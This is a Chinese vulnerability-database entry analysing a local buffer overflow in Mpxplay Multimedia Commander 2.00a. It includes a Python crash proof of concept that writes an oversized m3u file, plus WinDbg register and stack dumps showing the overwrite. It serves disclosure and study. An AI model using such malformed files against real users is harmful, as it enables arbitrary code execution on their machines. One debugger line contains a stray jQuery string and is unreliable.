Mpxplay Multimedia Commander 2.00a -...

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

使用如下python代码生成一个可以触发漏洞的m3u文件,调试环境为win7,由于存在ASLR,所以每次需要将改变的地址高4位加偏移计算真正地址。此漏洞依然是由于没有对长度进行检查的逻辑错误导致的本地溢出,可以构造畸形文件诱使目标点击后执行任意代码。 ``` junk = "A"*66666 file = open("CRASH.m3u",'w') file.write(junk) file.close() ``` 生成后打开mmc,触发这个漏洞,程序中断 ``` 0:009> t (20ec.26d0): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=41414141 ecx=74bbc2d6 edx=04d9e420 esi=00000000 edi=41414141 eip=00431af9 esp=04d9f020 ebp=04d9f038 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 mpxp_mmc+0x31af9: 00431af9 f643100b test byte ptr [ebx+10h],0Bh ds:002b:41414151=jQuery214019834307301789522_1444838931236 ``` 可以看到程序中断,ebx的值被修改成了41414141,此时[ebx+10h]=[41414141+10h],内存指向了一片无效地址,导致程序崩溃,查看当前内存空间 ``` :009> dd esp-100 l50 04d9ef20 41414141 41414141 41414141 41414141 04d9ef30 41414141 41414141 41414141 41414141 04d9ef40 41414141 41414141 41414141 41414141...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息